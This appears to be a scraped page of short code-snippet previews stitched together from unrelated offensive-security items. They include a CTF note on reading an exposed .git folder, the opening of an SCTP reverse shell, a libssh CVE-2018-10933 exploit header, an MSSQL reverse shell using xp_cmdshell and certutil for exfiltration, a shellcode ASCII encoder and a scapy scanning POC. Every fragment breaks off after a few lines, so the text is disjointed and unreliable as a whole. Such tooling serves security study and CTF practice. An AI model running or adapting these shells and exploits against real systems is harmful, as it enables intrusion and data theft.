| -- challenge 1: | |
| From the name of the challenge it was a dead giveway that there was a .git folder exposed. | |
| Then just find out where the git repo is hosted: | |
| curl http://0x70.apl3b.com/.git/config | |
| And get the repo hosting service: | |
| https://gitlab.com/DDuarte/twipy.git | |
| Finally check all the commits and on this one at the bottom of the page you can read a flag: |
| #!/usr/bin/env python3 | |
| # | |
| # Tiny SCTP Reverse Shell inspired by http://insecurety.net/?p=765 | |
| # Connect with `ncat --sctp -lvp 1234` | |
| import os, socket, subprocess | |
| RHOST = '127.0.0.1' | |
| RPORT = 1234 |
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| # Based on https://www.openwall.com/lists/oss-security/2018/08/16/1 | |
| # and on https://www.libssh.org/security/advisories/CVE-2018-10933.txt | |
| # Original exploit code https://gist.github.com/mlosapio/2062ebf943485a7289d226e0d00498e7 | |
| # References | |
| # https://qxf2.com/blog/ssh-using-python-paramiko/ | |
| # https://github.com/SoledaD208/CVE-2018-10933 | |
| # On OSX -> pip install paramiko==2.0.8 |
I spent the weekend meeting hackers in Vegas, and I got talking to one of them about CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so I thought I'd write up an example that's similar to something I found a few months ago.
If you're looking for bugs legally through a program like hackerone, or you're a programmer wanting to write secure PHP: this might be useful to you.
| import sys | |
| import requests | |
| import threading | |
| import HTMLParser | |
| from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler | |
| ''' | |
| Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration | |
| Author: @xassiz | |
| ''' |
| #!/usr/bin/env python | |
| from sys import argv | |
| import BaseHTTPServer | |
| import ssl | |
| class CORSHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): | |
| def do_OPTIONS(self): | |
| self.send_response(200, "ok") | |
| #self.send_header('Access-Control-Allow-Origin', '*') |
| ::########################################################################################################################## | |
| :: | |
| :: This script can ruin your day, if you run it without fully understanding what it does, you don't know what you are doing, | |
| :: | |
| :: OR BOTH!!! | |
| :: | |
| :: YOU HAVE BEEN WARNED!!!!!!!!!! | |
| :: | |
| :: This script is provided "AS IS" with no warranties, and confers no rights. | |
| :: Feel free to challenge me, disagree with me, or tell me I'm completely nuts in the comments section, |
| #!/usr/bin/python | |
| # | |
| # Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique, | |
| # and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler` | |
| # utility (as described in: Hacking - The Art of Exploitation). | |
| # | |
| # Basically one gives to the program's output a binary encoded shellcode, | |
| # and it yields on the output it's ASCII encoded form. | |
| # | |
| # This payload will at the beginning align the stack by firstly moving |
| #!/usr/bin/env python | |
| # DiabloHorn - https://diablohorn.com | |
| # scan target IP from an interface with no IP configured | |
| # POC - scapy | |
| # pkt = Ether(dst='00:0c:29:f6:a5:65',src='00:08:19:2c:e0:15') / IP(dst='172.16.218.178',src='172.16.218.255') / TCP(dport=445,flags='S') | |
| # sendp(pkt,iface='eth0') | |
| import sys | |
| from scapy.all import * |
| # Python3 code below | |
| import os | |
| import base64 | |
| import json | |
| from Crypto.Cipher import AES | |
| from phpserialize import loads | |
| import hashlib | |
| import hmac |